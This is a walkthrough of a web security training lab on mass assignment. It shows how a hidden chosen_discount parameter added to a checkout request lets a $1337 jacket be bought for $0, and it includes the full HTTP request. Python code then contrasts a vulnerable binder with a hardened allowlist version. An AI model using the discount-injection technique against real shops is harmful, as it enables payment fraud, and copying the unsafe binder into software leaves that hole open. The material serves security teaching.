1 Overview
To solve the lab, find and exploit a mass assignment vulnerability to buy a Lightweight l33t Leather Jacket. You can log in to your own account using the following credentials: wiener:peter
2 Required knowledge
To solve this lab, you'll need to know:
- What mass assignment is.
- Why mass assignment may result in hidden parameters.
- How to identify hidden parameters.
- How to exploit mass assignment vulnerabilities.
These points are covered in our API Testing Academy topic.
3 Solution approach
3.1 Normal business flow
- Open Lab: Exploiting a mass assignment vulnerability, click ACCESS THE LAB, and you are redirected to the lab's home page.
- Log in with the supplied credentials wiener:peter.
- After a successful login the user information is returned; note that the balance is $0.00.
- As the task requires, we need to buy the Lightweight l33t Leather Jacket. Open its details page, where the product can be added to the cart.
- Go to the cart. The order contains the Lightweight l33t Leather Jacket with quantity 1 at a unit price of $1337.00, for an order total of $1337.00. Click Place order to submit payment; the response says the balance is insufficient.
- At this point the business flow for buying the Lightweight l33t Leather Jacket has been walked through end to end. With an insufficient balance, we need to find a way to make the payment succeed.
3.2 Solution
- Review all endpoints, paying attention to requests whose MIME type is JSON.
- When paying for the order, the client first sends GET /api/checkout to query the order information, then sends the payment request:
POST /api/checkout HTTP/2
Host: 0aa200b204cb4d8e80a262f300c500c6.web-security-academy.net
Cookie: session=u3e7t4txepvHOPNYlgZMfeH2WhbjdoRv
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: https://0aa200b204cb4d8e80a262f300c500c6.web-security-academy.net/cart
Content-Type: text/plain;charset=UTF-8
Content-Length: 53
Origin: https://0aa200b204cb4d8e80a262f300c500c6.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{
    "chosen_products":[
        {
            "product_id":"1",
            "quantity":1
        }
    ]
}
- Comparing the response body of the GET request with the body of the POST request reveals two possible hidden parameters, chosen_discount and item_price:
{
    "chosen_discount": {
        "percentage": 0
    },
    "chosen_products": [
        {
            "product_id": "1",
            "name": "Lightweight \"l33t\" Leather Jacket",
            "quantity": 1,
            "item_price": 133700
        }
    ]
}
- Try adding the hidden parameters above, one at a time, to the POST /api/checkout HTTP/2 request.
- Setting chosen_discount to a 100% discount makes the purchase go through for $0.
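The root cause on the server side is that the checkout handler binds whatever JSON the client sends straight onto the order object, so fields the client was never meant to control (chosen_discount, item_price) become writable. The following Python is an added example, not the lab's own code, showing that vulnerable binding pattern beside a hardened binder that allowlists client-controlled fields and recomputes prices and discounts from server-side state. The Order class, CATALOG, load_order, bind_unsafe and bind_safe are all assumed names constructed for illustration; the catalog price mirrors the 133700 item_price seen in the GET /api/checkout response.

```python
# Added example (not the lab's own code): the mass assignment pattern behind this
# lab, side by side with a hardened checkout binder. All class, function and
# catalog values below are assumptions constructed for illustration.
from dataclasses import dataclass, field

# Constructed server-side catalog: prices in cents, as the lab's item_price suggests.
CATALOG = {"1": {"name": 'Lightweight "l33t" Leather Jacket', "price": 133700}}


@dataclass
class Order:
    chosen_products: list = field(default_factory=list)
    chosen_discount: dict = field(default_factory=lambda: {"percentage": 0})

    def total(self) -> int:
        """Order total in cents after applying the percentage discount."""
        subtotal = sum(p["item_price"] * p["quantity"] for p in self.chosen_products)
        pct = self.chosen_discount.get("percentage", 0)
        return subtotal * (100 - pct) // 100


def load_order() -> Order:
    """Server-side cart state, i.e. what GET /api/checkout would return."""
    return Order(chosen_products=[
        {"product_id": "1", "quantity": 1, "item_price": CATALOG["1"]["price"]}
    ])


def bind_unsafe(order: Order, body: dict) -> Order:
    """Vulnerable: copies every key the client sends onto the order object.
    chosen_discount and item_price become hidden parameters the client controls."""
    for key, value in body.items():
        if hasattr(order, key):
            setattr(order, key, value)
    return order


def bind_safe(order: Order, body: dict) -> Order:
    """Hardened: only product_id and quantity are taken from the client; price
    comes from the catalog and the discount stays whatever the server decided."""
    products = body.get("chosen_products")
    if not isinstance(products, list):
        raise ValueError("chosen_products must be a list")
    bound = []
    for item in products:
        product_id = str(item.get("product_id", ""))
        quantity = item.get("quantity")
        if product_id not in CATALOG:
            raise ValueError(f"unknown product_id {product_id!r}")
        if not isinstance(quantity, int) or quantity < 1:
            raise ValueError("quantity must be a positive integer")
        # Price is looked up server-side; any item_price in the request is ignored.
        bound.append({"product_id": product_id, "quantity": quantity,
                      "item_price": CATALOG[product_id]["price"]})
    order.chosen_products = bound
    # chosen_discount in the body is deliberately not bound.
    return order


if __name__ == "__main__":
    # Constructed request body carrying both hidden parameters from the write-up.
    body = {"chosen_products": [{"product_id": "1", "quantity": 1, "item_price": 133700}],
            "chosen_discount": {"percentage": 100}}
    print("unsafe total:", bind_unsafe(load_order(), body).total())  # 0
    print("safe total:", bind_safe(load_order(), body).total())      # 133700
```

The fix is not to blacklist chosen_discount but to bind only the fields the client legitimately owns and derive everything money-related from server state; as a detection aid, logging request bodies whose keys fall outside that allowlist surfaces probing of this kind.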